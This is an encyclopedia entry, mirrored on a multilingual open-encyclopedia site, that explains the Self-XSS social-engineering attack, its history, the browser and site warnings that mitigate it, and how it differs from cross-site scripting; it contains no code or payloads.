| 词条 | Self-XSS |
| 释义 |
OverviewSelf-XSS operates by tricking users into copying and pasting malicious content into their browsers' web developer console. Usually, the attacker posts a message that says by copying and running certain code, the user will be able to hack another user's account. In fact, the code allows the attacker to hijack the victim's account.[3] History and mitigationIn the past, a very similar attack took place, in which users were tricked into pasting malicious JavaScript into their address bar. When browser vendors stopped this by preventing easily running JavaScript from the address bar,[4][5] attackers started using Self-XSS in its current form. Web browser vendors and web sites have taken steps to mitigate this attack. Mozilla Firefox[6] and Google Chrome[7] have both begun implementing safeguards to warn users about self-XSS attacks. Facebook, Google+ and others now display a warning message when users open the web developer console, and they link to pages explaining the attack in detail.[8][9] EtymologyThe "self" part of the name comes from the fact that the user is attacking themself. The "XSS" part of the name comes from the abbreviation for cross-site scripting, because both attacks result in malicious code running on a legitimate site. However, the attacks don't have much else in common, because XSS is an attack against the website itself (which users cannot protect themselves against but can be fixed by the site operator making their site more secure), whereas self-XSS is a social engineering attack against the user (which savvy users can protect themselves against but the site operator cannot do anything about it).[10] References1. ^1 {{cite web | url=http://www.sophos.com/en-us/security-news-trends/security-trends/social-networking-security-threats/facebook.aspx | title=Social Networking Security Threats | publisher=Sophos | date=n.d. | accessdate=September 27, 2014}} [1][2][3][4][5][6][7][8]2. ^1 {{cite web | url=https://bugzilla.mozilla.org/show_bug.cgi?id=656433 | title=Bug 656433 – Disallow javascript: and data: URLs entered into the location bar from inheriting the principal of the currently-loaded page | publisher=Mozilla Foundation | work=Bugzilla | date=May 11, 2011 | accessdate=September 28, 2014}} 3. ^1 {{cite web | url=https://code.google.com/p/chromium/issues/detail?id=82181 | title=Issue 82181: [Linux] Strip javascript: schema from pastes/drops to omnibox | publisher=Google | work=Google Code | date=May 10, 2011 | accessdate=September 28, 2014}} 4. ^1 {{cite web | url=https://www.facebook.com/help/757846550903291 | title=What do Self-XSS scams look like? | publisher=Facebook | date=July 11, 2014 | accessdate=September 27, 2014 | website=Facebook Help}} 5. ^1 {{cite web | url=https://www.facebook.com/help/246962205475854 | title=What is Self-XSS? | publisher=Facebook | date=July 15, 2014 | accessdate=September 27, 2014 | website=Facebook Help}} 6. ^1 {{cite web | url=https://bugzilla.mozilla.org/show_bug.cgi?id=994134 | title=Bug 994134 – Warn first-time users on pasting code into the console | publisher=Mozilla Foundation | work=Bugzilla | date=April 9, 2014 | accessdate=September 28, 2014}} 7. ^1 {{cite web | url=https://code.google.com/p/chromium/issues/detail?id=345205 | title=Issue 345205: DevTools: Combat self-XSS | publisher=Google | work=Google Code | date=May 10, 2011 | accessdate=September 28, 2014}} 8. ^1 {{cite web | url=http://news.softpedia.com/news/Hackers-Trick-Facebook-Users-Into-Self-Cross-Site-Scripting-XSS-Scam-452364.shtml | title=Hackers Trick Facebook Users into Self Cross-Site Scripting (XSS) Scam | publisher=SoftNews NET SRL | website=Softpedia | date=July 28, 2014 | accessdate=September 27, 2014 | last=Ilascu | first=Ionut}} }} Further reading
2 : Social engineering (computer security)|Web security exploits |
| 随便看 |
|
开放百科全书收录14589846条英语、德语、日语等多语种百科知识,基本涵盖了大多数领域的百科知识,是一部内容自由、开放的电子版国际百科全书。